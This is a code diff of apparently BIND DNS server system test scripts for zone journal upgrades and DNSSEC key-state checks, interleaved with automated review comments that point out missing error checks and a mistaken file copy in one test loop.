+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+. ../conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+cp ns1/generic.db.in ns1/changed.db
+cp ns1/changed.ver1.jnl.saved ns1/changed.db.jnl
+
+cp ns1/generic.db.in ns1/unchanged.db
+cp ns1/unchanged.ver1.jnl.saved ns1/unchanged.db.jnl
+
+cp ns1/generic.db.in ns1/changed2.db
+cp ns1/changed.ver2.jnl.saved ns1/changed2.db.jnl
+
+cp ns1/generic.db.in ns1/unchanged2.db
+cp ns1/unchanged.ver2.jnl.saved ns1/unchanged2.db.jnl
+
+cp ns1/ixfr.db.in ns1/ixfr.db
+cp ns1/ixfr.ver1.jnl.saved ns1/ixfr.db.jnl
+
+cp ns1/generic.db.in ns1/d1212.db
+cp ns1/d1212.jnl.saved ns1/d1212.db.jnl
+
+cp ns1/generic.db.in ns1/d2121.db
+cp ns1/d2121.jnl.saved ns1/d2121.db.jnl
+
+cp ns1/generic.db.in ns1/maxjournal.db
+cp ns1/maxjournal.jnl.saved ns1/maxjournal.db.jnl
+
+cp ns1/generic.db.in ns1/maxjournal2.db
+cp ns1/maxjournal2.jnl.saved ns1/maxjournal2.db.jnl
+
+cp ns1/managed-keys.bind.in ns1/managed-keys.bind
+$PERL ../fromhex.pl < ns1/managed-keys.bind.jnl.in > ns1/managed-keys.bind.jnl
+
+copy_setports ns2/named.conf.in ns2/named.conf
+cp ns2/managed-keys.bind.in ns2/managed-keys.bind
+cp ns2/managed-keys.bind.jnl.in ns2/managed-keys.bind.jnl
diff --git a/bin/tests/system/journal/tests.sh b/bin/tests/system/journal/tests.sh
new file mode 100644
index 0000000..f6e0f4d
--- /dev/null
+++ b/bin/tests/system/journal/tests.sh
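Review bot: None of the `cp`, `copy_setports` or `$PERL ../fromhex.pl` steps is checked, so a missing or renamed fixture leaves a server starting with a stale or absent journal, and the problem only shows up later as an unrelated-looking grep miss in tests.sh. Adding `set -e` directly after `. ../conf.sh` would stop at the first failed step, assuming clean.sh and the helpers from conf.sh return zero on success. The two managed-keys journals are also prepared differently (ns1 through fromhex.pl, ns2 with a plain `cp` of a file the diff lists as binary); a short comment such as `# ns1 journal fixture is decoded by fromhex.pl; ns2 fixture is already binary` would explain why, if that is indeed the reason.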
@@ -0,0 +1,255 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. ../conf.sh + +dig_with_opts() { + "$DIG" @10.53.0.1 -p "$PORT" +tcp "$@" +} + +rndc_with_opts() { + "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@" +} + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "check outdated journal rolled forward (dynamic) ($n)" +ret=0 +dig_with_opts changed soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010902' dig.out.test$n > /dev/null || ret=1 +grep 'zone changed/IN: journal rollforward completed successfully using old journal format' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated empty journal did not cause an error (dynamic) ($n)" +ret=0 +dig_with_opts unchanged soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010901' dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated journals were updated or removed (dynamic) ($n)" +ret=0 +cat -v ns1/changed.db.jnl | grep "BIND LOG V9.2" > /dev/null || ret=1 +[ -f ns1/unchanged.db.jnl ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check updated journal has correct RR count (dynamic) ($n)" +ret=0 +$JOURNALPRINT -x ns1/changed.db.jnl | grep "rrcount 3 " > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check new-format journal rolled forward (dynamic) ($n)" 
+ret=0 +dig_with_opts changed2 soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010902' dig.out.test$n > /dev/null || ret=1 +grep 'zone changed2/IN: journal rollforward completed successfully: success' ns1/named.run > /dev/null || ret=1 +grep 'zone changed2/IN: journal rollforward completed successfully using old journal format' ns1/named.run > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check new-format empty journal did not cause error (dynamic) ($n)" +ret=0 +dig_with_opts unchanged2 soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010901' dig.out.test$n > /dev/null || ret=1 +grep 'zone unchanged2/IN: journal rollforward completed successfully' ns1/named.run > /dev/null && ret=1 +grep 'zone unchanged2/IN: journal rollforward completed successfully using old journal format' ns1/named.run > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check new-format journals were updated or removed (dynamic) ($n)" +ret=0 +cat -v ns1/changed2.db.jnl | grep "BIND LOG V9.2" > /dev/null || ret=1 +[ -f ns1/unchanged2.db.jnl ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated up-to-date journal succeeded (ixfr-from-differences) ($n)" +ret=0 +dig_with_opts -t soa ixfr > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010902' dig.out.test$n > /dev/null || ret=1 +grep 'zone ixfr/IN: journal rollforward completed successfully using old journal format: up to date' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated journal was updated (ixfr-from-differences) ($n)" +ret=0 +cat -v ns1/ixfr.db.jnl | grep "BIND LOG V9.2" > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" 
+status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers succeeded (version 1,2,1,2) ($n)" +ret=0 +dig_with_opts -t soa hdr1d1d2d1d2 > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010905' dig.out.test$n > /dev/null || ret=1 +grep 'zone hdr1d1d2d1d2/IN: journal rollforward completed successfully using old journal format: success' ns1/named.run > /dev/null || ret=1 +grep 'zone_journal_compact: zone hdr1d1d2d1d2/IN: repair full journal' ns1/named.run > /dev/null || ret=1 +grep 'hdr1d1d2d1d2/IN: dns_journal_compact: success' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers was updated (version 1,2,1,2) ($n)" +ret=0 +[ $($JOURNALPRINT -x ns1/d1212.jnl.saved | grep -c "version 1") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d1212.jnl.saved | grep -c "version 2") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d1212.db.jnl | grep -c "version 1") -eq 0 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d1212.db.jnl | grep -c "version 2") -eq 4 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers succeeded (version 2,1,2,1) ($n)" +ret=0 +dig_with_opts -t soa hdr1d2d1d2d1 > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010905' dig.out.test$n > /dev/null || ret=1 +grep 'zone hdr1d2d1d2d1/IN: journal rollforward completed successfully using old journal format: success' ns1/named.run > /dev/null || ret=1 +grep 'zone_journal_compact: zone hdr1d2d1d2d1/IN: repair full journal' ns1/named.run > /dev/null || ret=1 +grep 'zone hdr1d2d1d2d1/IN: dns_journal_compact: success' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers was updated (version 2,1,2,1) ($n)" +ret=0 +[ $($JOURNALPRINT -x 
ns1/d2121.jnl.saved | grep -c "version 1") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d2121.jnl.saved | grep -c "version 2") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d2121.db.jnl | grep -c "version 1") -eq 0 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d2121.db.jnl | grep -c "version 2") -eq 4 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check there are no journals left un-updated ($n)" +ret=0 +c1=$(cat -v ns1/*.jnl | grep -c "BIND LOG V9") +c2=$(cat -v ns1/*.jnl | grep -c "BIND LOG V9.2") +[ ${c1} -eq ${c2} ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check that journal with mixed headers can be compacted (version 1,2,1,2) ($n)" +ret=0 +journal=ns1/d1212.jnl.saved +seriallist=$($JOURNALPRINT -x $journal | awk '$1 == "Transaction:" { print $11 }') +for serial in $seriallist +do + cp $journal tmp.jnl + $JOURNALPRINT -c $serial tmp.jnl || ret=1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check that journal with mixed headers can be compacted (version 2,1,2,1) ($n)" +ret=0 +journal=ns1/d2121.jnl.saved +seriallist=$($JOURNALPRINT -x $journal | awk '$1 == "Transaction:" { print $11 }') +for serial in $seriallist +do + cp ns1/d1212.jnl.saved tmp.jnl + $JOURNALPRINT -c $serial tmp.jnl || ret=1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check upgrade of managed-keys.bind.jnl succeeded($n)" +ret=0 +$JOURNALPRINT ns1/managed-keys.bind.jnl > journalprint.out.test$n +lines=$(awk '$1 == "add" && $5 == "SOA" && $8 == "3297" { print }' journalprint.out.test$n | wc -l) +test $lines -eq 1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal downgrade/upgrade ($n)" +ret=0 +cp ns1/changed.db.jnl ns1/temp.jnl +$JOURNALPRINT -d ns1/temp.jnl +[ $($JOURNALPRINT -x ns1/temp.jnl | grep -c "version 1") -eq 1 ] 
|| ret=1 +$JOURNALPRINT -x ns1/temp.jnl | grep -q "Header version = 1" || ret=1 +$JOURNALPRINT -u ns1/temp.jnl +$JOURNALPRINT -x ns1/temp.jnl | grep -q "Header version = 2" || ret=1 +[ $($JOURNALPRINT -x ns1/temp.jnl | grep -c "version 2") -eq 1 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check max-journal-size works after journal update ($n)" +ret=0 +# journal was repaired, it should still be big +[ $(wc -c < ns1/maxjournal.db.jnl) -gt 12000 ] || ret=1 +# the zone hasn't been dumped yet, so 'rndc sync' should work without +# needing a zone update first. +rndc_with_opts 10.53.0.1 sync maxjournal +check_size() ( + [ $(wc -c < ns1/maxjournal.db.jnl) -lt 4000 ] +) +retry_quiet 10 check_size || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check max-journal-size works with non-updated journals ($n)" +ret=0 +# journal was not repaired, so it should still be big +[ $(wc -c < ns1/maxjournal2.db.jnl) -gt 12000 ] || ret=1 +# the zone hasn't been dumped yet, so 'rndc sync' should work without +# needing a zone update first. +rndc_with_opts 10.53.0.1 sync maxjournal2 +check_size() ( + [ $(wc -c < ns1/maxjournal2.db.jnl) -lt 4000 ] +) +retry_quiet 10 check_size || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal index consistency ($n)" +ret=0 +for jnl in ns1/*.jnl; do + $JOURNALPRINT -x $jnl 2>&1 | grep -q "Offset mismatch" && ret=1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that journal is applied to zone with keydata placeholder record" +ret=0 +grep 'managed-keys-zone: journal rollforward completed successfully: up to date' ns2/named.run > /dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
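Review bot: The final check (journal applied to the zone with the keydata placeholder record, grepping ns2/named.run) sets `ret=1` on a miss but never folds it into `status`, so the script still exits 0 when that check fails. Add ``status=`expr $status + $ret` `` after its `echo_i "failed"` line, and `($n)` to its title so it matches the other checks. Separately, the "version 2,1,2,1" compaction loop takes its serial list from `$journal` (ns1/d2121.jnl.saved) but copies `ns1/d1212.jnl.saved` into tmp.jnl, so the d2121 journal is never actually compacted; that line should read `cp $journal tmp.jnl`, as in the loop before it.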
diff --git a/bin/tests/system/kasp.sh b/bin/tests/system/kasp.sh new file mode 100644 index 0000000..d49baa3 --- /dev/null +++ b/bin/tests/system/kasp.sh 
@@ -0,0 +1,1238 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Common configuration data for kasp system tests, to be sourced into +# other shell scripts. +# + +# shellcheck source=conf.sh +. ../conf.sh + +############################################################################### +# Constants # +############################################################################### +DEFAULT_TTL=300 + +############################################################################### +# Query properties # +############################################################################### +TSIG="" +SHA1="FrSt77yPTFx6hTs4i2tKLB9LmE0=" +SHA224="hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA==" +SHA256="R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY=" +VIEW1="YPfMoAk6h+3iN8MDRQC004iSNHY=" +VIEW2="4xILSZQnuO1UKubXHkYUsvBRPu8=" +VIEW3="C1Azf+gGPMmxrUg/WQINP6eV9Y0=" + +############################################################################### +# Key properties # +############################################################################### +# ID +# BASEFILE +# EXPECT +# ROLE +# KSK +# ZSK +# FLAGS +# LIFETIME +# ALG_NUM +# ALG_STR +# ALG_LEN +# CREATED +# PUBLISHED +# ACTIVE +# RETIRED +# REVOKED +# REMOVED +# GOAL +# STATE_DNSKEY +# STATE_ZRRSIG +# STATE_KRRSIG +# STATE_DS +# EXPECT_ZRRSIG +# EXPECT_KRRSIG +# LEGACY +# PRIVATE +# PRIVKEY_STAT +# PUBKEY_STAT +# STATE_STAT + +key_key() { + echo "${1}__${2}" +} + +key_get() { + eval "echo \${$(key_key "$1" "$2")}" +} + +key_set() { + eval "$(key_key "$1" "$2")='$3'" +} + +key_stat() { + $PERL -e 'print((stat @ARGV[0])[9] . 
"\n");' "$1" +} + +# Save certain values in the KEY array. +key_save() +{ + # Save key id. + key_set "$1" ID "$KEY_ID" + # Save base filename. + key_set "$1" BASEFILE "$BASE_FILE" + # Save creation date. + key_set "$1" CREATED "${KEY_CREATED}" + # Save key change time. + key_set "$1" PRIVKEY_STAT $(key_stat "${BASE_FILE}.private") + key_set "$1" PUBKEY_STAT $(key_stat "${BASE_FILE}.key") + key_set "$1" STATE_STAT $(key_stat "${BASE_FILE}.state") +} + +# Clear key state. +# +# This will update either the KEY1, KEY2, or KEY3 array. +key_clear() { + key_set "$1" "ID" 'no' + key_set "$1" "IDPAD" 'no' + key_set "$1" "EXPECT" 'no' + key_set "$1" "ROLE" 'none' + key_set "$1" "KSK" 'no' + key_set "$1" "ZSK" 'no' + key_set "$1" "FLAGS" '0' + key_set "$1" "LIFETIME" 'none' + key_set "$1" "ALG_NUM" '0' + key_set "$1" "ALG_STR" 'none' + key_set "$1" "ALG_LEN" '0' + key_set "$1" "CREATED" '0' + key_set "$1" "PUBLISHED" 'none' + key_set "$1" "SYNCPUBLISH" 'none' + key_set "$1" "ACTIVE" 'none' + key_set "$1" "RETIRED" 'none' + key_set "$1" "REVOKED" 'none' + key_set "$1" "REMOVED" 'none' + key_set "$1" "GOAL" 'none' + key_set "$1" "STATE_DNSKEY" 'none' + key_set "$1" "STATE_KRRSIG" 'none' + key_set "$1" "STATE_ZRRSIG" 'none' + key_set "$1" "STATE_DS" 'none' + key_set "$1" "EXPECT_ZRRSIG" 'no' + key_set "$1" "EXPECT_KRRSIG" 'no' + key_set "$1" "LEGACY" 'no' + key_set "$1" "PRIVATE" 'yes' + key_set "$1" "PRIVKEY_STAT" '0' + key_set "$1" "PUBKEY_STAT" '0' + key_set "$1" "STATE_STAT" '0' +} + +# Start clear. +# There can be at most 4 keys at the same time during a rollover: +# 2x KSK, 2x ZSK +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +############################################################################### +# Utilities # +############################################################################### + +# Call dig with default options. 
+_dig_with_opts() { + + if [ -n "$TSIG" ]; then + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" -y "$TSIG" "$@" + else + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" + fi +} + +# RNDC. +_rndccmd() { + "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@" +} + +# Print IDs of keys used for generating RRSIG records for RRsets of type $1 +# found in dig output file $2. +get_keys_which_signed() { + _qtype=$1 + _output=$2 + # The key ID is the 11th column of the RRSIG record line. + awk -v qt="$_qtype" '$4 == "RRSIG" && $5 == qt {print $11}' < "$_output" +} + +# Get the key ids from key files for zone $2 in directory $1. +get_keyids() { + _dir=$1 + _zone=$2 + _regex="K${_zone}.+*+*.key" + + find "${_dir}" -mindepth 1 -maxdepth 1 -name "${_regex}" | sed "s,$_dir/K${_zone}.+\([0-9]\{3\}\)+\([0-9]\{5\}\).key,\2," +} + +# By default log errors and don't quit immediately. +_log=1 +_log_error() { + test $_log -eq 1 && echo_i "error: $1" + ret=$((ret+1)) +} +disable_logerror() { + _log=0 +} +enable_logerror() { + _log=1 +} + +# Set server key-directory ($1) and address ($2) for testing keys. +set_server() { + DIR=$1 + SERVER=$2 +} +# Set zone name for testing keys. +set_zone() { + ZONE=$1 + DYNAMIC="no" +} +# By default zones are considered static. +# When testing dynamic zones, call 'set_dynamic' after 'set_zone'. +set_dynamic() { + DYNAMIC="yes" +} + +# Set policy settings (name $1, number of keys $2, dnskey ttl $3) for testing keys. +set_policy() { + POLICY=$1 + NUM_KEYS=$2 + DNSKEY_TTL=$3 + CDS_DELETE="no" +} +# By default policies are considered to be secure. +# If a zone sets its policy to "insecure", call 'set_cdsdelete' to tell the +# system test to expect a CDS and CDNSKEY Delete record. +set_cdsdelete() { + CDS_DELETE="yes" +} + +# Set key properties for testing keys. +# $1: Key to update (KEY1, KEY2, ...) 
+# $2: Value +set_keyrole() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "ROLE" "$2" + key_set "$1" "KSK" "no" + key_set "$1" "ZSK" "no" + key_set "$1" "FLAGS" "0" + + test "$2" = "ksk" && key_set "$1" "KSK" "yes" + test "$2" = "ksk" && key_set "$1" "FLAGS" "257" + + test "$2" = "zsk" && key_set "$1" "ZSK" "yes" + test "$2" = "zsk" && key_set "$1" "FLAGS" "256" + + test "$2" = "csk" && key_set "$1" "KSK" "yes" + test "$2" = "csk" && key_set "$1" "ZSK" "yes" + test "$2" = "csk" && key_set "$1" "FLAGS" "257" +} +set_keylifetime() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "LIFETIME" "$2" +} +# The algorithm value consists of three parts: +# $2: Algorithm (number) +# $3: Algorithm (string-format) +# $4: Algorithm length +set_keyalgorithm() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "ALG_NUM" "$2" + key_set "$1" "ALG_STR" "$3" + key_set "$1" "ALG_LEN" "$4" +} +set_keysigning() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "EXPECT_KRRSIG" "$2" +} +set_zonesigning() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "EXPECT_ZRRSIG" "$2" +} + +# Set key timing metadata. Set to "none" to unset. +# $1: Key to update (KEY1, KEY2, ...) +# $2: Time to update (PUBLISHED, SYNCPUBLISH, ACTIVE, RETIRED, REVOKED, or REMOVED). +# $3: Value +set_keytime() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "$2" "$3" +} + +# Set key timing metadata to a value plus additional time. +# $1: Key to update (KEY1, KEY2, ...) +# $2: Time to update (PUBLISHED, SYNCPUBLISH, ACTIVE, RETIRED, REVOKED, or REMOVED). +# $3: Value +# $4: Additional time. +set_addkeytime() { + if [ -x "$PYTHON" ]; then + # Convert "%Y%m%d%H%M%S" format to epoch seconds. + # Then, add the additional time (can be negative). 
+ _value=$3 + _plus=$4 + $PYTHON > python.out.$ZONE.$1.$2 <<EOF +from datetime import datetime +from datetime import timedelta +_now = datetime.strptime("$_value", "%Y%m%d%H%M%S") +_delta = timedelta(seconds=$_plus) +_then = _now + _delta +print(_then.strftime("%Y%m%d%H%M%S")); +EOF + # Set the expected timing metadata. + key_set "$1" "$2" $(cat python.out.$ZONE.$1.$2) + fi +} + +# Set key state metadata. Set to "none" to unset. +# $1: Key to update (KEY1, KEY2, ...) +# $2: Key state to update (GOAL, STATE_DNSKEY, STATE_ZRRSIG, STATE_KRRSIG, or STATE_DS) +# $3: Value +set_keystate() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "$2" "$3" +} + +# Check the key $1 with id $2. +# This requires environment variables to be set. +# +# This will set the following environment variables for testing: +# BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" +# KEY_FILE="${BASE_FILE}.key" +# PRIVATE_FILE="${BASE_FILE}.private" +# STATE_FILE="${BASE_FILE}.state" +# KEY_ID=$(echo $1 | sed 's/^0\{0,4\}//') +# KEY_CREATED (from the KEY_FILE) +check_key() { + _dir="$DIR" + _zone="$ZONE" + _role=$(key_get "$1" ROLE) + _key_idpad="$2" + _key_id=$(echo "$_key_idpad" | sed 's/^0\{0,4\}//') + _alg_num=$(key_get "$1" ALG_NUM) + _alg_numpad=$(printf "%03d" "$_alg_num") + _alg_string=$(key_get "$1" ALG_STR) + _length=$(key_get "$1" "ALG_LEN") + _dnskey_ttl="$DNSKEY_TTL" + _lifetime=$(key_get "$1" LIFETIME) + _legacy=$(key_get "$1" LEGACY) + _private=$(key_get "$1" PRIVATE) + _flags=$(key_get "$1" FLAGS) + + _published=$(key_get "$1" PUBLISHED) + _active=$(key_get "$1" ACTIVE) + _retired=$(key_get "$1" RETIRED) + _revoked=$(key_get "$1" REVOKED) + _removed=$(key_get "$1" REMOVED) + + _goal=$(key_get "$1" GOAL) + _state_dnskey=$(key_get "$1" STATE_DNSKEY) + _state_zrrsig=$(key_get "$1" STATE_ZRRSIG) + _state_krrsig=$(key_get "$1" STATE_KRRSIG) + _state_ds=$(key_get "$1" STATE_DS) + + _ksk="no" + _zsk="no" + if [ "$_role" = "ksk" ]; then + _ksk="yes" + elif [ "$_role" = "zsk" ]; then + 
_zsk="yes" + elif [ "$_role" = "csk" ]; then + _zsk="yes" + _ksk="yes" + fi + + _role2="none" + if [ "$_flags" = "257" ]; then + _role2="key-signing" + elif [ "$_flags" = "256" ]; then + _role2="zone-signing" + fi + + BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" + KEY_FILE="${BASE_FILE}.key" + PRIVATE_FILE="${BASE_FILE}.private" + STATE_FILE="${BASE_FILE}.state" + KEY_ID="${_key_id}" + + # Check file existence. + [ -s "$KEY_FILE" ] || ret=1 + if [ "$_private" = "yes" ]; then + [ -s "$PRIVATE_FILE" ] || ret=1 + fi + if [ "$_legacy" = "no" ]; then + [ -s "$STATE_FILE" ] || ret=1 + fi + [ "$ret" -eq 0 ] || _log_error "${BASE_FILE} files missing" + [ "$ret" -eq 0 ] || return + + # Retrieve creation date. + grep "; Created:" "$KEY_FILE" > "${ZONE}.${KEY_ID}.${_alg_num}.created" || _log_error "mismatch created comment in $KEY_FILE" + KEY_CREATED=$(awk '{print $3}' < "${ZONE}.${KEY_ID}.${_alg_num}.created") + + if [ "$_private" = "yes" ]; then + grep "Created: ${KEY_CREATED}" "$PRIVATE_FILE" > /dev/null || _log_error "mismatch created in $PRIVATE_FILE" + fi + if [ "$_legacy" = "no" ]; then + grep "Generated: ${KEY_CREATED}" "$STATE_FILE" > /dev/null || _log_error "mismatch generated in $STATE_FILE" + fi + + test $_log -eq 1 && echo_i "check key file $BASE_FILE" + + # Check the public key file. + grep "This is a ${_role2} key, keyid ${_key_id}, for ${_zone}." "$KEY_FILE" > /dev/null || _log_error "mismatch top comment in $KEY_FILE" + grep "${_zone}\. ${_dnskey_ttl} IN DNSKEY ${_flags} 3 ${_alg_num}" "$KEY_FILE" > /dev/null || _log_error "mismatch DNSKEY record in $KEY_FILE" + # Now check the private key file. + if [ "$_private" = "yes" ]; then + grep "Private-key-format: v1.3" "$PRIVATE_FILE" > /dev/null || _log_error "mismatch private key format in $PRIVATE_FILE" + grep "Algorithm: ${_alg_num} (${_alg_string})" "$PRIVATE_FILE" > /dev/null || _log_error "mismatch algorithm in $PRIVATE_FILE" + fi + # Now check the key state file. 
+ if [ "$_legacy" = "no" ]; then + grep "This is the state of key ${_key_id}, for ${_zone}." "$STATE_FILE" > /dev/null || _log_error "mismatch top comment in $STATE_FILE" + if [ "$_lifetime" = "none" ]; then + grep "Lifetime: " "$STATE_FILE" > /dev/null && _log_error "unexpected lifetime in $STATE_FILE" + else + grep "Lifetime: ${_lifetime}" "$STATE_FILE" > /dev/null || _log_error "mismatch lifetime in $STATE_FILE" + fi + grep "Algorithm: ${_alg_num}" "$STATE_FILE" > /dev/null || _log_error "mismatch algorithm in $STATE_FILE" + grep "Length: ${_length}" "$STATE_FILE" > /dev/null || _log_error "mismatch length in $STATE_FILE" + grep "KSK: ${_ksk}" "$STATE_FILE" > /dev/null || _log_error "mismatch ksk in $STATE_FILE" + grep "ZSK: ${_zsk}" "$STATE_FILE" > /dev/null || _log_error "mismatch zsk in $STATE_FILE" + + # Check key states. + if [ "$_goal" = "none" ]; then + grep "GoalState: " "$STATE_FILE" > /dev/null && _log_error "unexpected goal state in $STATE_FILE" + else + grep "GoalState: ${_goal}" "$STATE_FILE" > /dev/null || _log_error "mismatch goal state in $STATE_FILE" + fi + + if [ "$_state_dnskey" = "none" ]; then + grep "DNSKEYState: " "$STATE_FILE" > /dev/null && _log_error "unexpected dnskey state in $STATE_FILE" + grep "DNSKEYChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected dnskey change in $STATE_FILE" + else + grep "DNSKEYState: ${_state_dnskey}" "$STATE_FILE" > /dev/null || _log_error "mismatch dnskey state in $STATE_FILE" + grep "DNSKEYChange: " "$STATE_FILE" > /dev/null || _log_error "mismatch dnskey change in $STATE_FILE" + fi + + if [ "$_state_zrrsig" = "none" ]; then + grep "ZRRSIGState: " "$STATE_FILE" > /dev/null && _log_error "unexpected zrrsig state in $STATE_FILE" + grep "ZRRSIGChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected zrrsig change in $STATE_FILE" + else + grep "ZRRSIGState: ${_state_zrrsig}" "$STATE_FILE" > /dev/null || _log_error "mismatch zrrsig state in $STATE_FILE" + grep "ZRRSIGChange: " "$STATE_FILE" > 
/dev/null || _log_error "mismatch zrrsig change in $STATE_FILE" + fi + + if [ "$_state_krrsig" = "none" ]; then + grep "KRRSIGState: " "$STATE_FILE" > /dev/null && _log_error "unexpected krrsig state in $STATE_FILE" + grep "KRRSIGChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected krrsig change in $STATE_FILE" + else + grep "KRRSIGState: ${_state_krrsig}" "$STATE_FILE" > /dev/null || _log_error "mismatch krrsig state in $STATE_FILE" + grep "KRRSIGChange: " "$STATE_FILE" > /dev/null || _log_error "mismatch krrsig change in $STATE_FILE" + fi + + if [ "$_state_ds" = "none" ]; then + grep "DSState: " "$STATE_FILE" > /dev/null && _log_error "unexpected ds state in $STATE_FILE" + grep "DSChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected ds change in $STATE_FILE" + else + grep "DSState: ${_state_ds}" "$STATE_FILE" > /dev/null || _log_error "mismatch ds state in $STATE_FILE" + grep "DSChange: " "$STATE_FILE" > /dev/null || _log_error "mismatch ds change in $STATE_FILE" + fi + fi +} + +# Check the key timing metadata for key $1. 
